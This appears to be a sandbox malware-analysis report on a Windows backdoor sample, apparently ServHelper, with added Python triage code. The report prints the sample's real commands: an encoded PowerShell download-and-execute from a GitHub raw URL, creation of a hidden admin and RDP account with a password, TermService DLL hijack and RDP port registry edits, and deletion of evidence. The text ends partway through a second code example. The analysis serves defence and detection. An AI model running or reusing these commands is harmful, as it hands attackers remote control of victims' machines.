PID 516 wrote to memory of 840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 1040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 1040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 1040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 1020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 1020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 1020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 516 wrote to memory of 828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 516 wrote to memory of 828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 828 wrote to memory of 1352 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 828 wrote to memory of 1352 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 828 wrote to memory of 1352 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 516 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 516 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 516 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1344 wrote to memory of 1692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1344 wrote to memory of 1692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1344 wrote to memory of 1692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1692 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tql0hdgn.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC06.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCC05.tmp"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net.exe

net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc WAvm5fYw /add

C:\Windows\system32\net.exe

net.exe user wgautilacc WAvm5fYw /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc WAvm5fYw /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc WAvm5fYw

C:\Windows\system32\net.exe

net.exe user wgautilacc WAvm5fYw

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc WAvm5fYw

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
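
The process listing above is the post-infection sequence in the order the sandbox saw it: net.exe (which hands each subcommand to net1.exe, hence every net command appears twice) adds wgautilacc and the JZCKHXIN$ account to Remote Desktop Users, adds wgautilacc to Administrators and sets its password; WMIC enumerates the GPU and CPU; an encoded PowerShell one-liner runs; and *.ps1 and *.txt are deleted from %temp%. The -enc argument is base64 of the script as UTF-16LE text, so a plain base64 decode gives interleaved NUL bytes and must be followed by a UTF-16LE decode. The Python below is an added triage example, not part of the sandbox report or of the ServHelper sample; the command lines are copied from this section, the function names and finding tags are my own, and the regexes cover the -e/-ec/-enc spellings PowerShell accepts.

```python
import base64
import re

# Command lines copied from the report (added example; helper names are
# my own). Only the net.exe copies are kept, since the net1.exe entries
# are the same commands forwarded by net.exe.
POWERSHELL_CMDLINE = (
    "powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)
REPORT_CMDLINES = [
    'net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD',
    'net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD',
    'net.exe LOCALGROUP "Administrators" wgautilacc /ADD',
    "net.exe user wgautilacc WAvm5fYw",
    "wmic path win32_VideoController get name",
    POWERSHELL_CMDLINE,
    '"C:\\Windows\\system32\\cmd.exe" /c del %temp%\\*.ps1 /f',
]

# PowerShell accepts -e, -ec and any prefix of -EncodedCommand; the value
# is base64 of the script text encoded as UTF-16LE, not UTF-8.
_ENC_FLAGS = sorted({"e", "ec"} | {"encodedcommand"[:n] for n in range(2, 15)},
                    key=len, reverse=True)
_ENC_ARG = re.compile(r"(?i)(?<!\S)-(?:%s)\s+([A-Za-z0-9+/=]+)" % "|".join(_ENC_FLAGS))
_URL = re.compile(r"https?://[^\s\"'()<>]+")
_NET_LOCALGROUP = re.compile(
    r'(?i)\bnet1?(?:\.exe)?\s+localgroup\s+(?:"([^"]+)"|(\S+))\s+(\S+)\s+/add\b')
_NET_USER = re.compile(r"(?i)\bnet1?(?:\.exe)?\s+user\s+(?!/)(\S+)(.*)$")
_DEL_TEMP = re.compile(r"(?i)\bdel\s+(%temp%\\\S+)")
PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}


def decode_encoded_command(cmdline):
    """Return the script behind a -enc/-EncodedCommand argument, or None."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # some loggers strip the padding
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
        return None


def extract_urls(text):
    """Pull http(s) URLs out of decoded script text."""
    return _URL.findall(text)


def triage_cmdline(cmdline):
    """Return (tag, details) findings for one command line."""
    findings = []
    m = _NET_LOCALGROUP.search(cmdline)
    if m:
        group = m.group(1) or m.group(2)
        tag = "privileged-group-add" if group.lower() in PRIVILEGED_GROUPS else "group-add"
        findings.append((tag, {"group": group, "member": m.group(3)}))
    m = _NET_USER.search(cmdline)
    if m and m.group(2).split():  # bare "net user <name>" only queries the account
        flags = {t.lower() for t in m.group(2).split()}
        tag = "local-account-create" if "/add" in flags else "local-password-set"
        findings.append((tag, {"user": m.group(1)}))
    m = _DEL_TEMP.search(cmdline)
    if m:
        findings.append(("indicator-removal", {"path": m.group(1)}))
    script = decode_encoded_command(cmdline)
    if script is not None:
        findings.append(("encoded-powershell", {"script": script, "urls": extract_urls(script)}))
    return findings


def triage_cmdlines(cmdlines):
    """Return [(cmdline, findings)] for every command line that raised a finding."""
    out = []
    for cmdline in cmdlines:
        findings = triage_cmdline(cmdline)
        if findings:
            out.append((cmdline, findings))
    return out


if __name__ == "__main__":
    for cmdline, findings in triage_cmdlines(REPORT_CMDLINES):
        for tag, details in findings:
            print(f"{tag:22} {details}")
```

Run against the report's own lines, the one-liner decodes to IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), which is the raw.githubusercontent.com traffic in the Network section; the net user line here only sets a password (no /add), so the account creation itself is not in this excerpt.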

Network

Country  Destination          Domain                     Proto
US       8.8.8.8:53           raw.githubusercontent.com  udp
US       185.199.111.133:443  raw.githubusercontent.com  tcp
US       185.199.111.133:443  raw.githubusercontent.com  tcp
US       8.8.8.8:53           asgyyya6ychcha.xyz         udp

Files

memory/1048-54-0x00000000414D0000-0x00000000418CF000-memory.dmp

memory/1048-57-0x0000000041054000-0x0000000041056000-memory.dmp

memory/1048-58-0x0000000041056000-0x0000000041057000-memory.dmp

memory/1048-56-0x0000000041052000-0x0000000041054000-memory.dmp

memory/1048-59-0x0000000041057000-0x0000000041058000-memory.dmp

memory/516-60-0x0000000000000000-mapping.dmp

memory/516-61-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp

memory/516-62-0x000007FEEA770000-0x000007FEEB2CD000-memory.dmp

memory/516-63-0x000000001B710000-0x000000001BA0F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/516-66-0x00000000027A2000-0x00000000027A4000-memory.dmp

memory/516-67-0x00000000027A4000-0x00000000027A7000-memory.dmp

memory/516-68-0x00000000027AB000-0x00000000027CA000-memory.dmp

memory/516-65-0x00000000027A0000-0x00000000027A2000-memory.dmp

memory/1092-69-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\tql0hdgn.cmdline

MD5 bfa9eeaa9080cff20cbceca63717205a
SHA1 6828ba86aeb421c1aed495b5ed9e41e9b0095ab1
SHA256 678a1235103090b99ae5d41d209edd6af3983e99045ccf90b8ae678028de8c99
SHA512 08c1c125f7a6844ec52ac36407fac31231429f8e89349adb4121cff9d7fc0912cfba1303d08d08c414177b324cf4c591fb65c7587be5fc602e2c94ffd6c96dc5

\??\c:\Users\Admin\AppData\Local\Temp\tql0hdgn.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/508-72-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSCCC05.tmp

MD5 f541329d870c5024d2b4749bf3a4666a
SHA1 eb3dc51404bf91fbc0b000191eb1bb7632cd8aa2
SHA256 8fb40691b94997c34f8435042d2db8e958a8d9f9c4f058ed59c916bd5e9cb504
SHA512 1e838e5c6ffc8b2c2a26aac8ec8e588cc253659c6d579d330d304dfc50eb75da6a546deab4727ce8724c4ea8ba874838a4659495e2684c4eaec8fcdad96934cb

C:\Users\Admin\AppData\Local\Temp\RESCC06.tmp

MD5 9000cdb870011d68ddd74226af7220ad
SHA1 a6f3d9b7050fc951b16c0fb8aa3a08a3f07961b3
SHA256 667cf1dbbc9b5b2ef0c419ff9ea5722a778f7c06a67b0cbfde8fa896f6e39242
SHA512 c318b264438afad377684d29dad4281f830ca78174678c0dade0a683ed5150d8c2dd8dc8c46e8ea3c0eb7c21e309fc384e0e6c6bf593a2133c65c93cc21f5339

C:\Users\Admin\AppData\Local\Temp\tql0hdgn.dll

MD5 23d9d54575b2b3d3d74494603462ad6c
SHA1 1cd1ddec831fc6b8bedccac342c63e6c2fe36273
SHA256 57e5d75d2ccbb52d5076e6ae74acb64018ec31734f35ed9faec511d24a038609
SHA512 18c91b3657602952d15250f439126b42b3563c2662971a356f66faadff925d5d7b1b875505188643618d9351971c734baa1cd3d3efa8547308e3899d00862a27

C:\Users\Admin\AppData\Local\Temp\tql0hdgn.pdb

MD5 d4e94d1a26ac8cdc38870bd7178924a8
SHA1 948347989b50823642fb8fbdaaea0797cf2abee8
SHA256 28f26aadee50650a856fc254f616debf87bcb86b54fd98957d789571625f3c57
SHA512 fac85d7e4b887c4875748452b774591f4abf0232ce8d7d016337b1e101b11a4911da0e192d6b1ee925180ef827b2b2399b680ec7a304df2c1e8bec81392b6b8e

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 f784c76a5f451d89ecd31dc71a8c26cb
SHA1 81b9f4163f834ea3cf133e2be9b8b81279e41c6b
SHA256 8d77e8f87f57c3cc6c5b19ea782763c6a4c3c18ee750357c050543d913e6ac9f
SHA512 5b8fd465141921c4791739fe5186b615594ae47e16c568fe6a640cb67c21aa25b0e1b5910c3eb56cf3a23ce4c6d251664e132a3007956ed3453dce3d1f713981

memory/1092-78-0x0000000002100000-0x0000000002102000-memory.dmp

memory/516-79-0x00000000027CD000-0x00000000027CE000-memory.dmp

memory/272-80-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 3deecd8e098f325312acc0cc767ebd9d
SHA1 4fcfd95eb60d1dc6a7fde6e3e709f6d0ca6ebf19
SHA256 12e520e866b11cd39cd1c122f9fba650c2ea8a981e3a598156e25b45f857f2a7
SHA512 115d3f4c4a569ffb3da38ecd0c06041e333e15d8fdd2e6e1c0b47686bd5c742c5dc4729f0838d5d41cd50eeb7499972956375d67b314f2bbc82f69f48982d390

memory/272-83-0x000007FEEA770000-0x000007FEEB2CD000-memory.dmp

memory/272-84-0x000000001B8E0000-0x000000001BBDF000-memory.dmp

memory/272-85-0x0000000002630000-0x0000000002632000-memory.dmp

memory/272-86-0x0000000002632000-0x0000000002634000-memory.dmp

memory/272-88-0x0000000002634000-0x0000000002637000-memory.dmp

memory/272-87-0x000000000263C000-0x000000000265B000-memory.dmp

memory/272-89-0x0000000002637000-0x0000000002638000-memory.dmp

memory/2020-90-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 3deecd8e098f325312acc0cc767ebd9d
SHA1 4fcfd95eb60d1dc6a7fde6e3e709f6d0ca6ebf19
SHA256 12e520e866b11cd39cd1c122f9fba650c2ea8a981e3a598156e25b45f857f2a7
SHA512 115d3f4c4a569ffb3da38ecd0c06041e333e15d8fdd2e6e1c0b47686bd5c742c5dc4729f0838d5d41cd50eeb7499972956375d67b314f2bbc82f69f48982d390

memory/2020-93-0x000007FEEA770000-0x000007FEEB2CD000-memory.dmp

memory/2020-94-0x00000000028E0000-0x00000000028E2000-memory.dmp

memory/2020-95-0x00000000028E2000-0x00000000028E4000-memory.dmp

memory/2020-96-0x00000000028E4000-0x00000000028E7000-memory.dmp

memory/2020-97-0x00000000028E7000-0x00000000028E8000-memory.dmp

memory/2020-98-0x000000001B950000-0x000000001BC4F000-memory.dmp

memory/2020-99-0x00000000028EC000-0x000000000290B000-memory.dmp

memory/1000-100-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 3deecd8e098f325312acc0cc767ebd9d
SHA1 4fcfd95eb60d1dc6a7fde6e3e709f6d0ca6ebf19
SHA256 12e520e866b11cd39cd1c122f9fba650c2ea8a981e3a598156e25b45f857f2a7
SHA512 115d3f4c4a569ffb3da38ecd0c06041e333e15d8fdd2e6e1c0b47686bd5c742c5dc4729f0838d5d41cd50eeb7499972956375d67b314f2bbc82f69f48982d390

memory/1000-103-0x000007FEEA770000-0x000007FEEB2CD000-memory.dmp

memory/1000-104-0x000000001B8F0000-0x000000001BBEF000-memory.dmp

memory/1000-105-0x0000000002510000-0x0000000002512000-memory.dmp

memory/1000-107-0x0000000002514000-0x0000000002517000-memory.dmp

memory/1000-106-0x0000000002512000-0x0000000002514000-memory.dmp

memory/1000-108-0x0000000002517000-0x0000000002518000-memory.dmp

memory/1000-109-0x000000000251C000-0x000000000253B000-memory.dmp

memory/1500-110-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/1644-112-0x0000000000000000-mapping.dmp

memory/868-113-0x0000000000000000-mapping.dmp

memory/1828-114-0x0000000000000000-mapping.dmp

memory/1196-115-0x0000000000000000-mapping.dmp

memory/1416-116-0x0000000000000000-mapping.dmp

memory/432-117-0x0000000000000000-mapping.dmp

memory/1028-118-0x0000000000000000-mapping.dmp

memory/840-119-0x0000000000000000-mapping.dmp

memory/1040-120-0x0000000000000000-mapping.dmp

memory/1020-121-0x0000000000000000-mapping.dmp

memory/828-122-0x0000000000000000-mapping.dmp

memory/1352-123-0x0000000000000000-mapping.dmp

memory/1344-124-0x0000000000000000-mapping.dmp

memory/1692-125-0x0000000000000000-mapping.dmp

memory/1348-126-0x0000000000000000-mapping.dmp

memory/1332-127-0x0000000000000000-mapping.dmp

memory/2028-128-0x0000000000000000-mapping.dmp

memory/620-129-0x0000000000000000-mapping.dmp

memory/1760-130-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 02de1d05ec7c49607d0469e7731760c6
SHA1 39f0cddc616ab7ccfd0030f9aa257d6603373fb6
SHA256 dcb3e99447dd9c7093c425de2dc13d18342299d6b3876542c8b18542b80ec9eb
SHA512 a33b3da342c96816477347e0dfb6a54b2202990370260aa7fb3de6774c6868a9abef8ec1c794115d927432346153663a600142ca86701adaf1cde2b28f749f82

\Windows\Branding\mediasvc.png

MD5 a82cc23d45b8e1de9897fa40dbfebecb
SHA1 16590d3f0a035e0c01a9959593dd35b5d417a18e
SHA256 300f336a781a00987d35d4db230a14f96d3566ad324d8a5f9b0193095ef3d821
SHA512 b644dc69e2937ce23dd0e49f19bf1541f3e72fc9d1ff1a27d9ec009ad908fc19d8470c11dfe49a305cc9db278d684c31553107f8f4808a157e6c2a3873f5025a

memory/1852-133-0x0000000000000000-mapping.dmp

memory/1964-134-0x0000000000000000-mapping.dmp

memory/1648-135-0x0000000000000000-mapping.dmp

memory/628-136-0x0000000000000000-mapping.dmp

memory/1496-137-0x0000000000000000-mapping.dmp

memory/928-138-0x0000000000000000-mapping.dmp

memory/1116-139-0x0000000000000000-mapping.dmp

memory/604-140-0x0000000000000000-mapping.dmp

memory/1640-141-0x0000000000000000-mapping.dmp

memory/1408-142-0x0000000000000000-mapping.dmp

memory/1692-143-0x0000000000000000-mapping.dmp

memory/1772-144-0x0000000000000000-mapping.dmp

memory/1208-145-0x0000000000000000-mapping.dmp

memory/1604-146-0x0000000000000000-mapping.dmp

memory/392-147-0x0000000000000000-mapping.dmp

memory/288-148-0x0000000000000000-mapping.dmp

memory/288-150-0x000007FEEA770000-0x000007FEEB2CD000-memory.dmp

memory/288-151-0x0000000001350000-0x0000000001352000-memory.dmp

memory/288-153-0x0000000001354000-0x0000000001357000-memory.dmp

memory/288-152-0x0000000001352000-0x0000000001354000-memory.dmp

memory/288-154-0x000000000135B000-0x000000000137A000-memory.dmp

memory/1780-155-0x0000000000000000-mapping.dmp

memory/1692-156-0x0000000000000000-mapping.dmp
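
The list above mixes per-process memory-region dumps (memory/<pid>-<seq>-<start>-<end>-memory.dmp, plus one 0x0-mapping.dmp entry per newly created process) with dropped files, and it repeats a file once per process that wrote it, which is why the 590aee7bdd69b59b.customDestinations-ms jump list appears three times with identical hashes. Two groups are worth pulling out by hand: tql0hdgn.cmdline, tql0hdgn.0.cs, tql0hdgn.dll and tql0hdgn.pdb together with the CSCCC05.tmp and RESCC06.tmp temporaries are the footprint PowerShell's Add-Type leaves when it compiles C# through csc.exe, so the downloaded script compiled native-calling code at runtime; and rfxvmt.dll, mediasrv.png and mediasvc.png land under C:\Windows rather than in the user profile (read the System32 drop together with the "Sets DLL path for service in the registry" signature in the overview). The Python below is an added example, not part of the sandbox report; it parses an excerpt of this section (copied with only the SHA256 lines kept, although the parser accepts all four hash lines), de-duplicates the per-process repeats, and isolates those two groups. Function names are my own.

```python
import re

# Excerpt of the Files section, copied from the report with the MD5/SHA1/
# SHA512 lines and blank separators left out for length (added example).
FILES_TEXT = r"""
memory/516-60-0x0000000000000000-mapping.dmp
memory/516-62-0x000007FEEA770000-0x000007FEEB2CD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
\??\c:\Users\Admin\AppData\Local\Temp\tql0hdgn.cmdline
SHA256 678a1235103090b99ae5d41d209edd6af3983e99045ccf90b8ae678028de8c99
\??\c:\Users\Admin\AppData\Local\Temp\tql0hdgn.0.cs
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
\??\c:\Users\Admin\AppData\Local\Temp\CSCCC05.tmp
SHA256 8fb40691b94997c34f8435042d2db8e958a8d9f9c4f058ed59c916bd5e9cb504
C:\Users\Admin\AppData\Local\Temp\tql0hdgn.dll
SHA256 57e5d75d2ccbb52d5076e6ae74acb64018ec31734f35ed9faec511d24a038609
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
SHA256 8d77e8f87f57c3cc6c5b19ea782763c6a4c3c18ee750357c050543d913e6ac9f
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
SHA256 12e520e866b11cd39cd1c122f9fba650c2ea8a981e3a598156e25b45f857f2a7
memory/272-80-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
SHA256 12e520e866b11cd39cd1c122f9fba650c2ea8a981e3a598156e25b45f857f2a7
C:\Windows\system32\rfxvmt.dll
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
\Windows\Branding\mediasrv.png
SHA256 dcb3e99447dd9c7093c425de2dc13d18342299d6b3876542c8b18542b80ec9eb
"""

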